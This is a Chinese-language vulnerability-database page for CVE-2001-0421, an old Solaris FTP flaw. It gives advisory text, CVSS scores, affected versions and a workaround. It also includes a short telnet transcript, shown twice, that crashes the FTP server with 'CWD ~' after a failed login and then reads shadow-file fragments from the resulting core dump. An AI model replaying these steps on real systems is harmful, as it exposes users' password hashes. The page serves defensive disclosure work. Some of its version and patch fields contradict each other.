CVE-2001-0421
CVSS6.4
发布时间 :2001-07-02 00:00:00
修订时间 :2008-09-05 16:24:04
NMCOES    

[原文]FTP server in Solaris 8 and earlier allows local and remote attackers to cause a core dump in the root directory, possibly with world-readable permissions, by providing a valid username with an invalid password followed by a CWD ~ command, which could release sensitive information such as shadowed passwords, or fill the disk partition.


[CNNVD]Solaris FTP Core Dump文件泄漏用户口令散列漏洞(CNNVD-200107-004)

        
        Solaris是Sun公司的一个著名的UNIX操作系统产品,应用非常广泛。
        2.6版本Solaris的FTP服务程序存在一个漏洞可能导致shadow文件内容泄露,其中包含了系统用户的密码散列。而默认情况下只有root可以读取shadow文件。
        Solaris 的in.ftpd在用户登陆前接收到一个'CWD ~'请求时,会将用户的home目录拷贝到一个缓冲区中。然而用户没有登陆前,这个home指针为空。这将造成一个段访问错误发生,ftpd会在系统根目录下产生一个core文件。这个core文件中可能包含shadow文件的部分内容。缺省情况下,在Solaris 2.6下,core文件是任何人可读的。所以普通用户可以获取部分或者全部的用户口令密文。在Solaris 7/8下,缺省core文件是其他人不可读取得,所以不会造成安全问题。
        

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0421
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0421
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-004
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2601
(VENDOR_ADVISORY)  BID  2601
http://www.securityfocus.com/archive/1/177200
(UNKNOWN)  BUGTRAQ  20010417 Re: SUN SOLARIS 5.6/5.7 FTP Globbing Exploit !

- 漏洞信息

Solaris FTP Core Dump文件泄漏用户口令散列漏洞
中危 配置错误
2001-07-02 00:00:00 2005-10-20 00:00:00
本地  
        
        Solaris是Sun公司的一个著名的UNIX操作系统产品,应用非常广泛。
        2.6版本Solaris的FTP服务程序存在一个漏洞可能导致shadow文件内容泄露,其中包含了系统用户的密码散列。而默认情况下只有root可以读取shadow文件。
        Solaris 的in.ftpd在用户登陆前接收到一个'CWD ~'请求时,会将用户的home目录拷贝到一个缓冲区中。然而用户没有登陆前,这个home指针为空。这将造成一个段访问错误发生,ftpd会在系统根目录下产生一个core文件。这个core文件中可能包含shadow文件的部分内容。缺省情况下,在Solaris 2.6下,core文件是任何人可读的。所以普通用户可以获取部分或者全部的用户口令密文。在Solaris 7/8下,缺省core文件是其他人不可读取得,所以不会造成安全问题。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 禁止产生core或者通过设置umask使core文件不可读
        厂商补丁:
        Sun
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://sunsolve.sun.com/security

- 漏洞信息 (20764)

Solaris 2.6 FTP Core Dump Shadow Password Recovery Vulnerability (EDBID:20764)
solaris remote
2001-04-17 Verified
0 warning3
N/A [点击下载]
source: http://www.securityfocus.com/bid/2601/info

Solaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server.

A problem in the ftp server included with the Solaris Operating System could allow a local user to recover parts of the shadow file, containing encrypted passwords. Due to a previously known problem involving a buffer overflow in glob(), it is possible to cause a buffer overflow in the Solaris ftp server, which will dump parts of the shadow file to core. This can be done with the CWD ~ command, using a non-standard ftp client.

Therefore, a local user could cause a buffer overflow in the ftp server, and upon reading the core file, recover passwords for other local users, potentially gaining elevated privileges.

[root@ /usr/sbin]> telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun26 FTP server (SunOS 5.6) ready.
user warning3
331 Password required for warning3. <-- a valid username
pass blahblah <--- a wrong password
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
[root@ /usr/sbin]> ls -l /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
[root@ /usr/sbin]> strings /core|more
[...snip...]
lp:NP:6445::::::
P:64
eH::::
uucp:NP:6445::: 		

- 漏洞信息

8684
Solaris FTP Forced Core Dump Information Disclosure
Local Access Required Information Disclosure
Loss of Confidentiality Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2001-04-17 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Solaris FTP Core Dump Shadow Password Recovery Vulnerability
Configuration Error 2601
No Yes
2001-04-17 12:00:00 2009-07-11 06:06:00
This vulnerability was announced to Bugtraq by Warning3 <warning3@mail.com> on April 17, 2001.

- 受影响的程序版本

Sun Solaris 2.6
Sun Solaris 8_sparc
Sun Solaris 7.0

- 不受影响的程序版本

Sun Solaris 8_sparc
Sun Solaris 7.0

- 漏洞讨论

Solaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server.

A problem in the ftp server included with the Solaris Operating System could allow a local user to recover parts of the shadow file, containing encrypted passwords. Due to a previously known problem involving a buffer overflow in glob(), it is possible to cause a buffer overflow in the Solaris ftp server, which will dump parts of the shadow file to core. This can be done with the CWD ~ command, using a non-standard ftp client.

Therefore, a local user could cause a buffer overflow in the ftp server, and upon reading the core file, recover passwords for other local users, potentially gaining elevated privileges.

- 漏洞利用

[root@ /usr/sbin]&gt; telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun26 FTP server (SunOS 5.6) ready.
user warning3
331 Password required for warning3. &lt;-- a valid username
pass blahblah &lt;--- a wrong password
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
[root@ /usr/sbin]&gt; ls -l /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
[root@ /usr/sbin]&gt; strings /core|more
[...snip...]
lp:NP:6445::::::
P:64
eH::::
uucp:NP:6445:::

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站